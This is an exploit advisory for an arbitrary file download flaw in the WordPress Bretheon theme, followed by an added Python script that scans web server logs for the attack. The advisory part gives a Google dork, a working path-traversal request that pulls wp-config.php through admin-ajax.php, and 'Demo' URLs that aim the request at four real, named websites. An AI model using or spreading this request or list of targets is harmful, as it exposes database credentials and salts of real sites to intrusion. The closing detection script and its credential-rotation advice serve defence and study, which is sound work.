WordPress Bretheon theme suffers from an arbitrary file download vulnerability.
14319d94ced2e88f07fb75dde8d7a0af6db0baeddf2e8632f638cb4f4b442ee9
# Exploit Title: WordPress Theme Bretheon Arbitrary File Download Vulnerability
# Date: 17/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact: Md5@live.com.pk - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Tested on: Linux / Windows
# Google Dork: inurl:wp-content/themes/bretheon/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# Demo
http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
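
# Detection (added example, not part of the original advisory)
The PoC request is easy to spot in web server access logs. The script below is an added example, not the author's or the theme's code: it flags admin-ajax.php requests with action=revslider_show_image whose img value, after decoding, contains a ".." segment, is an absolute path, or does not end in an image extension. The Combined Log Format input, the extension allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate img values end in one of these extensions.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".webp")
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_img(target):
    """Return the decoded img value if the request fits the PoC pattern, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "revslider_show_image" not in params.get("action", []):
        return None
    for raw in params.get("img", []):
        # parse_qs decodes once; decode again to catch double encoding (%252e%252e).
        value = unquote(raw).replace("\\", "/")
        if ".." in value.split("/") or value.startswith("/") or not value.lower().endswith(IMAGE_EXT):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_img) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        value = suspicious_img(m.group(1)) if m else None
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [17/Jan/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [17/Jan/2014:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%2fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.4 - - [17/Jan/2014:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2014/01/banner.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [17/Jan/2014:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE):
        print(f"{ip} requested img={value}")
```

A hit answered with status 200 means the contents of wp-config.php may have been disclosed, so the database credentials and authentication salts it holds should be rotated.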